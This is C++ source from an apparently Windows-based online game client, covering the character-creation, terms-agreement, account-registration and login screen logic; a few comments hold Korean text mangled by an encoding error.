		PutAlignedString(370 + SCREENX, 580 + SCREENX, 345 + 16*i++ + SCREENY, UPDATE_SCREEN_ON_CREATE_NEW_CHARACTER30);
		PutAlignedString(370 + SCREENX, 580 + SCREENX, 345 + 16*i++ + SCREENY, UPDATE_SCREEN_ON_CREATE_NEW_CHARACTER31);
		PutAlignedString(370 + SCREENX, 580 + SCREENX, 345 + 16*i++ + SCREENY, UPDATE_SCREEN_ON_CREATE_NEW_CHARACTER32);
	}
	else if ((msX >= 384 + SCREENX) && (msX <= 384+72 + SCREENX) && (msY >= 445 + SCREENY) && (msY <= 445+15 + SCREENY))  {
		m_cCurFocus = 2;
		if (strlen(cName) <= 0)
		{	i= 0 ;
			PutAlignedString(370 + SCREENX, 580 + SCREENX, 345 + 16*i++ + SCREENY, UPDATE_SCREEN_ON_CREATE_NEW_CHARACTER35);//"Please enter a character name."
		}
		else if (iPoint > 0)
		{	i= 0 ;
			PutAlignedString(370 + SCREENX, 580 + SCREENX, 345 + 16*i++ + SCREENY, UPDATE_SCREEN_ON_CREATE_NEW_CHARACTER36);//"You need to select your character class."
		}else if (m_Misc.bCheckValidName(cName) == FALSE)
		{	i= 0 ;
			PutAlignedString(370 + SCREENX, 580 + SCREENX, 345 + 16*i++ + SCREENY, UPDATE_SCREEN_ON_CREATE_NEW_CHARACTER39);//"Cannot use special characters "
			PutAlignedString(370 + SCREENX, 580 + SCREENX, 345 + 16*i++ + SCREENY, UPDATE_SCREEN_ON_CREATE_NEW_CHARACTER40);//"in your character's name. Please"
			PutAlignedString(370 + SCREENX, 580 + SCREENX, 345 + 16*i++ + SCREENY, UPDATE_SCREEN_ON_CREATE_NEW_CHARACTER41);//"type another name."
		}else
		{	i= 0 ;
			PutAlignedString(370 + SCREENX, 580 + SCREENX, 345 + 16*i++ + SCREENY, UPDATE_SCREEN_ON_CREATE_NEW_CHARACTER44);//"
			PutAlignedString(370 + SCREENX, 580 + SCREENX, 345 + 16*i++ + SCREENY, UPDATE_SCREEN_ON_CREATE_NEW_CHARACTER45);//"
			PutAlignedString(370 + SCREENX, 580 + SCREENX, 345 + 16*i++ + SCREENY, UPDATE_SCREEN_ON_CREATE_NEW_CHARACTER46);//"
			PutAlignedString(370 + SCREENX, 580 + SCREENX, 345 + 16*i++ + SCREENY, UPDATE_SCREEN_ON_CREATE_NEW_CHARACTER47);//"
			PutAlignedString(370 + SCREENX, 580 + SCREENX, 345 + 16*i++ + SCREENY, UPDATE_SCREEN_ON_CREATE_NEW_CHARACTER48);//"
		}
	}else if ((msX >= 500 + SCREENX) && (msX <= 500+72 + SCREENX) && (msY >= 445 + SCREENY) && (msY <= 445+15 + SCREENY))
	{	m_cCurFocus = 3;
		PutAlignedString(370 + SCREENX, 580 + SCREENX, 345 + SCREENY, UPDATE_SCREEN_ON_CREATE_NEW_CHARACTER49);
	}

	if ((msX >= 60 + SCREENX) && (msX <= 60+72 + SCREENX) && (msY >= 445 + SCREENY) && (msY <= 445+15 + SCREENY)) {
		m_cCurFocus = 4;
		PutAlignedString(370 + SCREENX, 580 + SCREENX, 345 + SCREENY, UPDATE_SCREEN_ON_CREATE_NEW_CHARACTER50);
	}

	if ((msX >= 145 + SCREENX) && (msX <= 145+72 + SCREENX) && (msY >= 445 + SCREENY) && (msY <= 445+15 + SCREENY)) {
		m_cCurFocus = 5;
		PutAlignedString(370 + SCREENX, 580 + SCREENX, 345 + SCREENY, UPDATE_SCREEN_ON_CREATE_NEW_CHARACTER51);
	}

	if ((msX >= 230 + SCREENX) && (msX <= 230+72 + SCREENX) && (msY >= 445 + SCREENY) && (msY <= 445+15 + SCREENY)) {
		m_cCurFocus = 6;
		PutAlignedString(370 + SCREENX, 580 + SCREENX, 345 + SCREENY, UPDATE_SCREEN_ON_CREATE_NEW_CHARACTER52);
	}

	if (m_DDraw.iFlip() == DDERR_SURFACELOST) RestoreSprites();
}

void CGame::_LoadAgreementTextContents(char cType)
{
 char * pContents, * token, cTemp[120], cFileName[120];
 char   seps[] = "\n";
 int    iIndex = 0, i;
 class  CStrTok * pStrTok;
 DWORD  dwFileSize;
 HANDLE hFile;
 FILE * pFile;

	for (i = 0; i < DEF_TEXTDLGMAXLINES; i++) {
		if (m_pAgreeMsgTextList[i] != NULL)
			delete m_pAgreeMsgTextList[i];
		m_pAgreeMsgTextList[i] = NULL;
	}

	ZeroMemory(cTemp, sizeof(cTemp));
	ZeroMemory(cFileName, sizeof(cFileName));

	wsprintf(cTemp, "contents%d", cType);

	strcat(cFileName, "contents");
	strcat(cFileName, "\\");
	strcat(cFileName, "\\");
	strcat(cFileName, cTemp);
	strcat(cFileName, ".txt");

	hFile = CreateFile(cFileName, GENERIC_READ, NULL, NULL, OPEN_EXISTING, NULL, NULL);
	dwFileSize = GetFileSize(hFile, NULL);
	if (hFile != INVALID_HANDLE_VALUE) CloseHandle(hFile);

	pFile = fopen(cFileName, "rt");
	if (pFile == NULL) return;
	else {
		pContents = new char[dwFileSize+1];
		ZeroMemory(pContents, dwFileSize+1);
		fread(pContents, dwFileSize, 1, pFile);
	}

	fclose(pFile);
	pStrTok = new class CStrTok(pContents, seps);
	token = pStrTok->pGet();
	while( token != NULL ) {
		m_pAgreeMsgTextList[iIndex] = new class CMsg(NULL, token, NULL);
		token = pStrTok->pGet();
		iIndex++;
	}
	delete pStrTok;
	delete[] pContents;
}

void CGame::UpdateScreen_OnAgreement()
{
 short sX, sY, msX, msY, msZ;
 char  cLB, cRB;
 char  cMIresult;
 static class CMouseInterface * pMI;
 int i, iTotalLines, iPointerLoc;
 DWORD dwTime = timeGetTime();
 double d1,d2,d3;
 int iMIbuttonNum;

	sX = 121;
	sY = 22;

	if (m_cGameModeCount == 0) {
		m_iAgreeView = 0;
		_LoadAgreementTextContents(0);

		pMI = new class CMouseInterface;
		pMI->AddRect(sX+82 -105, sY+355,sX+131 -105,sY+374);
		pMI->AddRect(sX+235 -105, sY+355,sX+303 -105,sY+375);
	}

	m_cGameModeCount++;
	if (m_cGameModeCount > 100) m_cGameModeCount = 100;
	if (m_bEnterPressed == TRUE) {
		PlaySound('E', 14, 5);
		ChangeGameMode(DEF_GAMEMODE_ONCREATENEWACCOUNT);
		ClearContents_OnCreateNewAccount();
		delete pMI;
		return;
	}
	if (m_bEscPressed == TRUE) {
		PlaySound('E', 14, 5);
		ChangeGameMode(DEF_GAMEMODE_ONMAINMENU);
		delete pMI;
		m_bEscPressed = FALSE;
		return;
	}
	m_DInput.UpdateMouseState(&msX, &msY, &msZ, &cLB, &cRB);

	iMIbuttonNum = pMI->iGetStatus(msX, msY, cLB, &cMIresult);
	if (cMIresult == DEF_MIRESULT_CLICK) {
		switch (iMIbuttonNum) {
		case 1: // Agree
			PlaySound('E', 14, 5);
			ChangeGameMode(DEF_GAMEMODE_ONCREATENEWACCOUNT);
			ClearContents_OnCreateNewAccount();
			delete pMI;
			return;

		case 2:	// Disagree
			PlaySound('E', 14, 5);
			ChangeGameMode(DEF_GAMEMODE_ONMAINMENU);
			delete pMI;
			return;
		}
	}

	DrawNewDialogBox(DEF_SPRID_INTERFACE_ND_AGREEMENT, 0,0,0, TRUE);
	DrawNewDialogBox(DEF_SPRID_INTERFACE_ND_TEXT, 43, 38,12, FALSE);

	iTotalLines = 0;
	for (i = 0; i < DEF_TEXTDLGMAXLINES; i++)
	if (m_pAgreeMsgTextList[i] != NULL) iTotalLines++;

	d1 = (double)m_iAgreeView;
	d2 = (double)(iTotalLines - 20);
	d3 = (double)d1 / d2;
	d1 = 338.0f * d3;
	iPointerLoc = (int)d1;
	m_pSprite[DEF_SPRID_INTERFACE_ND_GAME2]->PutSpriteFast(sX +361 -112, sY +37 +13 +iPointerLoc, 7, dwTime);

	for (i = 0; i < 20; i++)
	if (m_pAgreeMsgTextList[i + m_iAgreeView] != NULL) {
		PutAlignedString(60, 360, sY + 65 +i*13, m_pAgreeMsgTextList[i + m_iAgreeView]->m_pMsg, 45,25,25);
	}

	if( msZ != 0 )
	{
		m_iAgreeView = m_iAgreeView - msZ/60;
		m_DInput.m_sZ = 0;
	}
	if (cLB != 0 && iTotalLines > 20)
	{ 	if ((msX >= sX +345 -112) && (msX <= sX +380 -112) && (msY >= sY +50) && (msY <= sY +395))
		{	d1 = (double)(msY - (sY + 37 +13));
			d2 = (double)(iTotalLines - 17);
			d3 = (double)(d1 * d2)/(338.0f);
			m_iAgreeView = (int)d3;
			m_pSprite[DEF_SPRID_INTERFACE_ND_GAME2]->PutTransSprite(sX +361 -112, sY +37 +13 +iPointerLoc, 4, dwTime);
	}	}
	if( m_iAgreeView < 0 ) m_iAgreeView = 0;
	if( iTotalLines > 20 && m_iAgreeView > iTotalLines-20 ) m_iAgreeView = iTotalLines-20;

	if ((msX > sX + 82 -105) && (msX < sX + 131 -105) && (msY > sY + 355 -3) && (msY < sY + 374 +3))
		 DrawNewDialogBox(DEF_SPRID_INTERFACE_ND_BUTTON, sX + 43 + 20 -23 +45 -105,  sY + 265 +90, 13);
	else DrawNewDialogBox(DEF_SPRID_INTERFACE_ND_BUTTON, sX + 43 + 20 -23 +45 -105,  sY + 265 +90, 12);

	if ((msX > sX + 235 -105) && (msX < sX + 303 -105) && (msY > sY + 355 -3) && (msY < sY + 375 +3))
		 DrawNewDialogBox(DEF_SPRID_INTERFACE_ND_BUTTON, sX + 158 + 57 -23 +45 -105, sY + 265 +90, 15);
	else DrawNewDialogBox(DEF_SPRID_INTERFACE_ND_BUTTON, sX + 158 + 57 -23 +45 -105, sY + 265 +90, 14);

	DrawVersion();
	m_pSprite[DEF_SPRID_MOUSECURSOR]->PutSpriteFast(msX, msY, 0, dwTime);

	if (m_DDraw.iFlip() == DDERR_SURFACELOST) RestoreSprites();
}

void CGame::UpdateScreen_OnCreateNewAccount()
{short msX, msY, msZ;
 char cLB, cRB;
 char cMIresult;
 int  iMIbuttonNum;
 static class CMouseInterface * pMI;
 static char cName[12], cPassword[12], cConfirm[12], cPrevFocus, cSSN_A[8], cSSN_B[8], cQuiz[44] ,cAnswer[20], cTempQuiz[44] ;
 DWORD dwTime = timeGetTime();
 int iFlag = 0;

	if (m_cGameModeCount == 0)
	{	pMI = new class CMouseInterface;
		pMI->AddRect(310+ SCREENX, 80 + SCREENY,560 + SCREENX,100 + SCREENY);
		pMI->AddRect(310 + SCREENX,101 + SCREENY,558 + SCREENX,122 + SCREENY);
		pMI->AddRect(310 + SCREENX,123 + SCREENY,558 + SCREENX,145 + SCREENY);
		
		pMI->AddRect(300 + SCREENX,192 + SCREENY,560 + SCREENX,231 + SCREENY);
		pMI->AddRect(300 + SCREENX,232 + SCREENY,560 + SCREENX,268 + SCREENY);   // Quiz 8  // +41
		pMI->AddRect(300 + SCREENX,269 + SCREENY,560 + SCREENX,306 + SCREENY);   // Answer 9
		pMI->AddRect(297 + SCREENX, 399 + SCREENY, 367 + SCREENX, 417 + SCREENY);  // Create 10
		pMI->AddRect(392 + SCREENX, 399 + SCREENY, 462 + SCREENX, 417 + SCREENY);  // Clear  11
		pMI->AddRect(488 + SCREENX, 399 + SCREENY, 558 + SCREENX, 417 + SCREENY);  // Cancel  12   Size 73 x 15
		cPrevFocus  = 1;
		m_cCurFocus = 1;
		m_cMaxFocus = 9; //12
		m_bEnterPressed = FALSE;
		m_cArrowPressed = 0;
		ZeroMemory(m_cEmailAddr, sizeof(m_cEmailAddr));
		ZeroMemory(cName, sizeof(cName));
		ZeroMemory(cPassword, sizeof(cPassword));
		ZeroMemory(cConfirm, sizeof(cConfirm));
		ZeroMemory(cSSN_A, sizeof(cSSN_A));
		ZeroMemory(cSSN_B, sizeof(cSSN_B));
		ZeroMemory(m_cAccountSSN, sizeof(m_cAccountSSN));
		ZeroMemory(cQuiz, sizeof(cQuiz));
		ZeroMemory(cTempQuiz, sizeof(cTempQuiz));
		ZeroMemory(cAnswer, sizeof(cAnswer));
		StartInputString(427 + SCREENX, 84 + SCREENY, 11, cName);
		ClearInputString();
	}

	m_cGameModeCount++;
	if (m_cGameModeCount > 100) m_cGameModeCount = 100;
	if (m_cArrowPressed != 0)
	{	switch (m_cArrowPressed) {
		case 1:
			m_cCurFocus--;
			if (m_cCurFocus <= 0) m_cCurFocus = m_cMaxFocus;
			break;
		case 3:
			m_cCurFocus++;
			if (m_cCurFocus > m_cMaxFocus) m_cCurFocus = 1;
			break;
		}
		m_cArrowPressed = 0;
	}

	if (m_bEscPressed == TRUE)
	{	ChangeGameMode(DEF_GAMEMODE_ONMAINMENU);
		delete pMI;
		m_bEscPressed = FALSE;
		return;
	}

	if (cPrevFocus != m_cCurFocus)
	{	EndInputString();
		switch (m_cCurFocus) {
		case 1:
			StartInputString(427 + SCREENX, 84 + SCREENY, 11, cName);
			break;
		case 2:
			StartInputString(427 + SCREENX, 106 + SCREENY, 11, cPassword);
			break;
		case 3:
			StartInputString(427 + SCREENX, 129 + SCREENY, 11, cConfirm);
			break;
		case 4:
			StartInputString(311 + SCREENX, 215 + SCREENY, 31, m_cEmailAddr);
			break;
		case 5:
			StartInputString(311 + SCREENX, 253 + SCREENY, 44, cQuiz);
			break;
		case 6:
			StartInputString(311 + SCREENX, 291 + SCREENY, 19, cAnswer);
			break;
		}
		cPrevFocus = m_cCurFocus;
	}

	m_DDraw.ClearBackB4();
	DrawNewDialogBox(DEF_SPRID_INTERFACE_ND_NEWACCOUNT, 0,0,0, TRUE);
	PutString(377 + SCREENX, 84 + SCREENY,  "Account:", RGB(100,100,200));
	PutString(372 + SCREENX, 106 + SCREENY, "Password:", RGB(100,100,200));
	PutString(372 + SCREENX, 129 + SCREENY, "(confirm)", RGB(100,100,200));
	PutString(271 + SCREENX, 215 + SCREENY, "eMail:", RGB(100,100,200));
	PutString(276 + SCREENX, 253 + SCREENY, "Quiz:", RGB(100,100,200));
	PutString(266 + SCREENX, 291 + SCREENY, "Answer:", RGB(100,100,200));

	if ((m_cCurFocus == 2) || (m_cCurFocus == 3))
		 ShowReceivedString(TRUE);
	else if ((m_cCurFocus == 1) || (m_cCurFocus == 4) || (m_cCurFocus == 5) || (m_cCurFocus == 6))
		ShowReceivedString();

	if (m_cCurFocus != 1) {
		if (m_Misc.bCheckValidName(cName) != FALSE)
			 PutString2(427 + SCREENX, 84 + SCREENY, cName, 100,200,100);
		else PutString2(427 + SCREENX, 84 + SCREENY, cName, 200,100,100);
	}
	if (m_cCurFocus != 2) {
		if (m_Misc.bCheckValidName(cPassword) != FALSE)
			 PutString(427 + SCREENX, 106 + SCREENY, cPassword, RGB(100,200,100), TRUE, 1);
		else PutString(427 + SCREENX, 106 + SCREENY, cPassword, RGB(200,100,100), TRUE, 1);
	}

	if (m_cCurFocus != 3) {
		if (memcmp(cPassword, cConfirm, 10) == 0)
			 PutString(427 + SCREENX, 129 + SCREENY, cConfirm, RGB(100,200,100), TRUE, 1);
		else PutString(427 + SCREENX, 129 + SCREENY, cConfirm, RGB(200,100,100), TRUE, 1);
	}
	if (memcmp(cPassword, cConfirm, 10) != 0) iFlag = 9;

	if (m_cCurFocus != 4) {
		if( m_Misc.bIsValidEmail(m_cEmailAddr) )
			PutString2(311 + SCREENX, 48 + 190 -25 +2 + SCREENY, m_cEmailAddr, 100,200,100);
		else PutString2(311 + SCREENX, 48 + 190 -25 +2 + SCREENY, m_cEmailAddr, 200,100,100);
	}

	wsprintf(cTempQuiz,"%s",cQuiz) ;
	m_Misc.ReplaceString(cTempQuiz, ' ', '_');

	if (m_cCurFocus != 5) {
		PutString2(311 + SCREENX, 48 + 226 -25 +4 + SCREENY, cQuiz, 100,200,100);
		
	}

	if (m_cCurFocus != 6) {
		PutString2(311 + SCREENX, 291 + SCREENY, cAnswer, 100,200,100);
		
	}

	if (strlen(cAnswer) == 0)							iFlag = 11;
	if (strlen(cTempQuiz) == 0)							iFlag = 10;
	if (m_Misc.bCheckValidName(cPassword) == FALSE)		iFlag = 7;
	if (m_Misc.bCheckValidName(cName) == FALSE)			iFlag = 6;
	if (m_Misc.bIsValidEmail(m_cEmailAddr) == FALSE)	iFlag = 5;
	if (strlen(cConfirm) == 0)							iFlag = 3;
	if (strlen(cPassword) == 0)							iFlag = 2;
	if ((strlen(cName) == 0 ))							iFlag = 1;

	// Centuu - Reintroducidos mensajes de CreateAccount del cliente original.
	switch (m_cCurFocus) {
	case 1:
		PutAlignedString(290 + SCREENX, 575 + SCREENX, 330 + SCREENY, UPDATE_SCREEN_ON_CREATE_NEW_ACCOUNT1);//"  ̸ Էմϴ."
		PutAlignedString(290 + SCREENX, 575 + SCREENX, 345 + SCREENY, UPDATE_SCREEN_ON_CREATE_NEW_ACCOUNT2);//"̸ Ưڸ  ,,"
		PutAlignedString(290 + SCREENX, 575 + SCREENX, 360 + SCREENY, UPDATE_SCREEN_ON_CREATE_NEW_ACCOUNT3);//"ѱ  ̷ մϴ.
		break;

	case 2:
		PutAlignedString(290 + SCREENX, 575 + SCREENX, 330 + SCREENY, UPDATE_SCREEN_ON_CREATE_NEW_ACCOUNT4);//" н带 Էմϴ." 
		PutAlignedString(290 + SCREENX, 575 + SCREENX, 345 + SCREENY, UPDATE_SCREEN_ON_CREATE_NEW_ACCOUNT5);//"н Ưڸ  ,,"
		PutAlignedString(290 + SCREENX, 575 + SCREENX, 360 + SCREENY, UPDATE_SCREEN_ON_CREATE_NEW_ACCOUNT6);//"ѱ  ּ 8 ̻ Է"
		break;

	case 3:
		PutAlignedString(290 + SCREENX, 575 + SCREENX, 330 + SCREENY, UPDATE_SCREEN_ON_CREATE_NEW_ACCOUNT8);//"н带 ѹ  Էմϴ."
		PutAlignedString(290 + SCREENX, 575 + SCREENX, 345 + SCREENY, UPDATE_SCREEN_ON_CREATE_NEW_ACCOUNT9);//" Է н Ȯϰ ġؾ"
		PutAlignedString(290 + SCREENX, 575 + SCREENX, 360 + SCREENY, UPDATE_SCREEN_ON_CREATE_NEW_ACCOUNT10);//"մϴ."
		break;

	case 4:
		PutAlignedString(290 + SCREENX, 575 + SCREENX, 330 + SCREENY, UPDATE_SCREEN_ON_CREATE_NEW_ACCOUNT21);
		PutAlignedString(290 + SCREENX, 575 + SCREENX, 345 + SCREENY, UPDATE_SCREEN_ON_CREATE_NEW_ACCOUNT22);
		PutAlignedString(290 + SCREENX, 575 + SCREENX, 360 + SCREENY, UPDATE_SCREEN_ON_CREATE_NEW_ACCOUNT23);
		break;

	case 5:
		PutAlignedString(290 + SCREENX, 575 + SCREENX, 330 + SCREENY, UPDATE_SCREEN_ON_CREATE_NEW_ACCOUNT25);
		PutAlignedString(290 + SCREENX, 575 + SCREENX, 345 + SCREENY, UPDATE_SCREEN_ON_CREATE_NEW_ACCOUNT26);
		break;

	case 6:
		PutAlignedString(290 + SCREENX, 575 + SCREENX, 330 + SCREENY, UPDATE_SCREEN_ON_CREATE_NEW_ACCOUNT29);
		break;

	case 7:
		switch (iFlag) {
		case 0:
			PutAlignedString(290 + SCREENX, 575 + SCREENX, 330 + SCREENY, UPDATE_SCREEN_ON_CREATE_NEW_ACCOUNT33);
			break;

		case 1:
			PutAlignedString(290 + SCREENX, 575 + SCREENX, 330 + SCREENY, UPDATE_SCREEN_ON_CREATE_NEW_ACCOUNT35);
			break;

		case 2:
			PutAlignedString(290 + SCREENX, 575 + SCREENX, 330 + SCREENY, UPDATE_SCREEN_ON_CREATE_NEW_ACCOUNT38);
			break;

		case 3:
			PutAlignedString(290 + SCREENX, 575 + SCREENX, 330 + SCREENY, UPDATE_SCREEN_ON_CREATE_NEW_ACCOUNT42);
			break;

		case 5:
			PutAlignedString(290 + SCREENX, 575 + SCREENX, 330 + SCREENY, UPDATE_SCREEN_ON_CREATE_NEW_ACCOUNT50);
			break;

		case 6:
			PutAlignedString(290 + SCREENX, 575 + SCREENX, 330 + SCREENY, UPDATE_SCREEN_ON_CREATE_NEW_ACCOUNT52);
			PutAlignedString(290 + SCREENX, 575 + SCREENX, 345 + SCREENY, UPDATE_SCREEN_ON_CREATE_NEW_ACCOUNT53);
			break;

		case 7:
			PutAlignedString(290 + SCREENX, 575 + SCREENX, 330 + SCREENY, UPDATE_SCREEN_ON_CREATE_NEW_ACCOUNT56);
			PutAlignedString(290 + SCREENX, 575 + SCREENX, 345 + SCREENY, UPDATE_SCREEN_ON_CREATE_NEW_ACCOUNT57);
			break;

		case 9:
			PutAlignedString(290 + SCREENX, 575 + SCREENX, 330 + SCREENY, UPDATE_SCREEN_ON_CREATE_NEW_ACCOUNT63);
			PutAlignedString(290 + SCREENX, 575 + SCREENX, 345 + SCREENY, UPDATE_SCREEN_ON_CREATE_NEW_ACCOUNT64);
			PutAlignedString(290 + SCREENX, 575 + SCREENX, 360 + SCREENY, UPDATE_SCREEN_ON_CREATE_NEW_ACCOUNT65);
			break;
		case 10:
			PutAlignedString(290 + SCREENX, 575 + SCREENX, 330 + SCREENY, UPDATE_SCREEN_ON_CREATE_NEW_ACCOUNT67);
			break;
		case 11:
			PutAlignedString(290 + SCREENX, 575 + SCREENX, 330 + SCREENY, UPDATE_SCREEN_ON_CREATE_NEW_ACCOUNT69);
			break;
		case 12:
			PutAlignedString(290 + SCREENX, 575 + SCREENX, 330 + SCREENY, UPDATE_SCREEN_ON_CREATE_NEW_ACCOUNT73);
			PutAlignedString(290 + SCREENX, 575 + SCREENX, 345 + SCREENY, UPDATE_SCREEN_ON_CREATE_NEW_ACCOUNT74);
			break;

		case 13:
			PutAlignedString(290 + SCREENX, 575 + SCREENX, 330 + SCREENY, UPDATE_SCREEN_ON_CREATE_NEW_ACCOUNT77);
			PutAlignedString(290 + SCREENX, 575 + SCREENX, 345 + SCREENY, UPDATE_SCREEN_ON_CREATE_NEW_ACCOUNT78);
			break;

		}
		break;

	case 8:
		PutAlignedString(290 + SCREENX, 575 + SCREENX, 330 + SCREENY, UPDATE_SCREEN_ON_CREATE_NEW_ACCOUNT80);
		break;

	case 9:
		PutAlignedString(290 + SCREENX, 575 + SCREENX, 330 + SCREENY, UPDATE_SCREEN_ON_CREATE_NEW_ACCOUNT81);
		break;
	}


	if ( (iFlag == 0) && (m_cCurFocus == 7) )
		 m_pSprite[DEF_SPRID_INTERFACE_ND_BUTTON]->PutSpriteFast(199+98 + SCREENX, 398 + SCREENY, 25, dwTime);
	else m_pSprite[DEF_SPRID_INTERFACE_ND_BUTTON]->PutSpriteFast(199+98 + SCREENX, 398 + SCREENY, 24, dwTime);

	if (m_cCurFocus == 8)
		 m_pSprite[DEF_SPRID_INTERFACE_ND_BUTTON]->PutSpriteFast(294+98 + SCREENX, 398 + SCREENY, 27, dwTime);
	else m_pSprite[DEF_SPRID_INTERFACE_ND_BUTTON]->PutSpriteFast(294+98 + SCREENX, 398 + SCREENY, 26, dwTime);

	if (m_cCurFocus == 9)
		 m_pSprite[DEF_SPRID_INTERFACE_ND_BUTTON]->PutSpriteFast(390+98 + SCREENX, 398 + SCREENY, 17, dwTime);
	else m_pSprite[DEF_SPRID_INTERFACE_ND_BUTTON]->PutSpriteFast(390+98 + SCREENX, 398 + SCREENY, 16, dwTime);

	DrawVersion(TRUE);
	m_DInput.UpdateMouseState(&msX, &msY, &msZ, &cLB, &cRB);
	m_pSprite[DEF_SPRID_MOUSECURSOR]->PutSpriteFast(msX, msY, 0, dwTime);
	if (m_bEnterPressed == TRUE)
	{	PlaySound('E', 14, 5);
		switch (m_cCurFocus) {
		case 1:
		case 2:
		case 3:
		case 4:
		case 5:
		case 6:
			m_cCurFocus++;
			if (m_cCurFocus > m_cMaxFocus) m_cCurFocus = 1;
			break;

		case 7:
			if (iFlag != 0) return;
			ZeroMemory(m_cAccountName, sizeof(m_cAccountName));
			ZeroMemory(m_cAccountPassword, sizeof(m_cAccountPassword));

			ZeroMemory(m_cAccountQuiz, sizeof(m_cAccountQuiz));
			ZeroMemory(m_cAccountAnswer, sizeof(m_cAccountAnswer));

			strcpy(m_cAccountName, cName);
			strcpy(m_cAccountPassword, cPassword);

			strcpy(m_cAccountQuiz, cTempQuiz);
			strcpy(m_cAccountAnswer, cAnswer);
			m_cAccountQuiz[45] = ' ' ;
			m_cAccountAnswer[20] = ' ' ;

			ZeroMemory(m_cAccountSSN, sizeof(m_cAccountSSN));
			wsprintf(m_cAccountSSN, "%s-%s", cSSN_A, cSSN_B);

			if (memcmp(cPassword, cConfirm, 10) != 0)
			{	ChangeGameMode(DEF_GAMEMODE_ONMSG);
				ZeroMemory(m_cMsg, sizeof(m_cMsg));
				strcpy(m_cMsg, UPDATE_SCREEN_ON_CREATE_NEW_ACCOUNT82);
				//"Cannot create account! - password not match!"
				delete pMI;
				return;
			}
			m_pLSock = new class XSocket(m_hWnd, DEF_SOCKETBLOCKLIMIT);
			m_pLSock->bConnect(m_cLogServerAddr, m_iLogServerPort, WM_USER_LOGSOCKETEVENT);
			m_pLSock->bInitBufferSize(30000);

			ChangeGameMode(DEF_GAMEMODE_ONCONNECTING);
			m_dwConnectMode = MSGID_REQUEST_CREATENEWACCOUNT;
			ZeroMemory(m_cMsg, sizeof(m_cMsg));
			strcpy(m_cMsg, "00");
			delete pMI;
			return;

		case 8:
			ZeroMemory(cName, sizeof(cName));
			ZeroMemory(cPassword, sizeof(cPassword));
			ZeroMemory(cConfirm, sizeof(cConfirm));
			ZeroMemory(m_cAccountAge, sizeof(m_cAccountAge));
			ZeroMemory(m_cAccountCountry, sizeof(m_cAccountCountry));
			ZeroMemory(m_cAccountSSN, sizeof(m_cAccountSSN));
			ZeroMemory(m_cEmailAddr, sizeof(m_cEmailAddr));
			ZeroMemory(cSSN_A, sizeof(cSSN_A));
			ZeroMemory(cSSN_B, sizeof(cSSN_B));
			ZeroMemory(cQuiz, sizeof(cQuiz));
			ZeroMemory(cTempQuiz, sizeof(cTempQuiz));
			ZeroMemory(cAnswer, sizeof(cAnswer));

			break;

		case 9:
			ChangeGameMode(DEF_GAMEMODE_ONMAINMENU);
			delete pMI;
			return;
		}
		m_bEnterPressed = FALSE;
	}

	iMIbuttonNum = pMI->iGetStatus(msX, msY, cLB, &cMIresult);
	if (cMIresult == DEF_MIRESULT_CLICK) {
		PlaySound('E', 14, 5);

		switch (iMIbuttonNum) {
		default:
			m_cCurFocus = iMIbuttonNum;
			break;

		case 7:
			if (iFlag != 0) return;
			ZeroMemory(m_cAccountName, sizeof(m_cAccountName));
			ZeroMemory(m_cAccountPassword, sizeof(m_cAccountPassword));

			ZeroMemory(m_cAccountQuiz, sizeof(m_cAccountQuiz));
			ZeroMemory(m_cAccountAnswer, sizeof(m_cAccountAnswer));


			strcpy(m_cAccountName, cName);
			strcpy(m_cAccountPassword, cPassword);
			strcpy(m_cAccountQuiz, cTempQuiz);
			strcpy(m_cAccountAnswer, cAnswer);

			ZeroMemory(m_cAccountSSN, sizeof(m_cAccountSSN));
			wsprintf(m_cAccountSSN, "%s-%s", cSSN_A, cSSN_B);

			if (memcmp(cPassword, cConfirm, 10) != 0)
			{	ChangeGameMode(DEF_GAMEMODE_ONMSG);
				ZeroMemory(m_cMsg, sizeof(m_cMsg));
				strcpy(m_cMsg, UPDATE_SCREEN_ON_CREATE_NEW_ACCOUNT82);
				//"Cannot create account! - password not match!"
				delete pMI;
				return;
			}

			m_pLSock = new class XSocket(m_hWnd, DEF_SOCKETBLOCKLIMIT);
			m_pLSock->bConnect(m_cLogServerAddr, m_iLogServerPort, WM_USER_LOGSOCKETEVENT);
			m_pLSock->bInitBufferSize(30000);
			ChangeGameMode(DEF_GAMEMODE_ONCONNECTING);
			m_dwConnectMode = MSGID_REQUEST_CREATENEWACCOUNT;
			ZeroMemory(m_cMsg, sizeof(m_cMsg));
			strcpy(m_cMsg, "00");
			delete pMI;
			return;

		case 8:
			ZeroMemory(cName, sizeof(cName));
			ZeroMemory(cPassword, sizeof(cPassword));
			ZeroMemory(cConfirm, sizeof(cConfirm));
			ZeroMemory(m_cAccountAge, sizeof(m_cAccountAge));
			ZeroMemory(m_cAccountCountry, sizeof(m_cAccountCountry));
			ZeroMemory(m_cAccountSSN, sizeof(m_cAccountSSN));
			ZeroMemory(m_cEmailAddr, sizeof(m_cEmailAddr));
			ZeroMemory(cSSN_A, sizeof(cSSN_A));
			ZeroMemory(cSSN_B, sizeof(cSSN_B));
			ZeroMemory(cQuiz, sizeof(cQuiz));
			ZeroMemory(cTempQuiz, sizeof(cTempQuiz));
			ZeroMemory(cAnswer, sizeof(cAnswer));
			break;

		case 9:
			ChangeGameMode(DEF_GAMEMODE_ONMAINMENU);
			delete pMI;
			return;
		}
	}

	if ((msX >= 297 + SCREENX) && (msX <= 370 + SCREENX) && (msY >= 396 + SCREENY) && (msY <= 417 + SCREENY))  m_cCurFocus = 7;  //12
	if ((msX >= 392 + SCREENX) && (msX <= 465 + SCREENX) && (msY >= 396 + SCREENY) && (msY <= 417 + SCREENY)) m_cCurFocus = 8;  //13
	if ((msX >= 488 + SCREENX) && (msX <= 561 + SCREENX) && (msY >= 396 + SCREENY) && (msY <= 417 + SCREENY)) m_cCurFocus = 9; //14

	if (m_DDraw.iFlip() == DDERR_SURFACELOST) RestoreSprites();
}

void CGame::UpdateScreen_OnLogin()
{
 short msX, msY, msZ;
 char cLB, cRB;
 char cMIresult;
 int  iMIbuttonNum;
 static class CMouseInterface * pMI;
 static char  cPassword[12], cPrevFocus;
 static char cName[12];
	
	if (m_cGameModeCount == 0)
	{	EndInputString();
		pMI = new class CMouseInterface;
		pMI->AddRect(350, 280, 500, 300);
		pMI->AddRect(350, 320, 500, 340);
		pMI->AddRect(240, 400, 400, 430);
		pMI->AddRect(460, 400, 600, 430);
		cPrevFocus  = 1;
		m_cCurFocus = 1;
		m_cMaxFocus = 4;
		m_bEnterPressed = FALSE;
		m_cArrowPressed = 0;
		ZeroMemory(cName, sizeof(cName));
		ZeroMemory(cPassword, sizeof(cPassword));
